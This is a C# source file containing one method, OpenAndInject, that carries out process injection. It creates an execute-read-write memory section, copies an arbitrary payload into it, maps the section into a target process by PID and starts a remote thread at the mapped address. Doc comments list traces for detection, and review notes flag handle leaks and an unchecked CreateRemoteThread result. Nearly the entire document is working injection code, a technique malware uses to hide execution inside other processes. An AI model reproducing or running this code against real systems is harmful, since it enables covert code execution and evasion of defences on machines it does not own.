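/// <summary>
/// Copies <paramref name="payload"/> into a section created with
/// <c>PAGE_EXECUTE_READWRITE</c>, maps that section into the process identified by
/// <paramref name="pid"/>, and starts a remote thread at the mapped address.
/// </summary>
/// <param name="pid">Identifier of the target process, passed to <c>OpenProcess</c>.</param>
/// <param name="payload">Bytes copied into the shared section.</param>
/// <returns>
/// <c>false</c> if the process handle, the section, either mapping, or the local unmap fails;
/// <c>true</c> once the remote-thread call has been issued. The result of that call is not
/// inspected, so <c>true</c> does not confirm that a thread was actually created.
/// </returns>
/// <remarks>
/// Observable behaviour for detection and review: a section created with execute+write
/// protection, the same section mapped into the current process and then into a second
/// process, and a remote thread whose start address lies inside that mapped view.
/// Handles and the local view are released on every exit path.
/// </remarks>
public static bool OpenAndInject(int pid, byte[] payload)
{
    IntPtr hproc = OpenProcess(pid);

    // NOTE(review): assumes the OpenProcess helper reports failure as IntPtr.Zero - confirm.
    if (hproc == IntPtr.Zero)
    {
        return false;
    }

    IntPtr section = IntPtr.Zero;
    IntPtr baseAddr = IntPtr.Zero;

    try
    {
        uint size = InjectionHelper.GetSectionSize(payload.Length);

        // Create the section in the current process.
        section = InjectionHelper.CreateSection(size, Natives.PAGE_EXECUTE_READWRITE);
        if (section == IntPtr.Zero)
        {
            return false;
        }

        // Map the section into the current process.
        IntPtr viewSize = (IntPtr)size;
        InjectionHelper.MapViewOfSection(section, Natives.GetCurrentProcess(), ref baseAddr, ref viewSize, Natives.PAGE_EXECUTE_READWRITE);
        if (baseAddr == IntPtr.Zero)
        {
            return false;
        }

        // Copy the payload into the local view of the section.
        Marshal.Copy(payload, 0, baseAddr, payload.Length);

        // Map the same section into the target process.
        IntPtr baseAddrEx = IntPtr.Zero;
        IntPtr viewSizeEx = (IntPtr)size;
        InjectionHelper.MapViewOfSection(section, hproc, ref baseAddrEx, ref viewSizeEx, Natives.PAGE_EXECUTE_READWRITE);
        if (baseAddrEx == IntPtr.Zero || viewSizeEx == IntPtr.Zero)
        {
            return false;
        }

        // The local view is no longer needed. Clear the variable either way so the
        // finally block does not attempt a second unmap of the same address.
        bool unmapped = InjectionHelper.UnMapViewOfSection(baseAddr);
        baseAddr = IntPtr.Zero;
        if (!unmapped)
        {
            return false;
        }

        // NOTE(review): the return value is discarded, so a failed call is still reported
        // as success, and any thread handle it returns is never closed.
        Natives.CreateRemoteThread(hproc, IntPtr.Zero, 0, baseAddrEx, IntPtr.Zero, 0, IntPtr.Zero);

        return true;
    }
    finally
    {
        // Release everything acquired above; the early-return paths previously leaked the
        // process handle, the section handle and (on a remote-map failure) the local view.
        if (baseAddr != IntPtr.Zero)
        {
            InjectionHelper.UnMapViewOfSection(baseAddr);
        }

        if (section != IntPtr.Zero)
        {
            Natives.CloseHandle(section);
        }

        Natives.CloseHandle(hproc);
    }
}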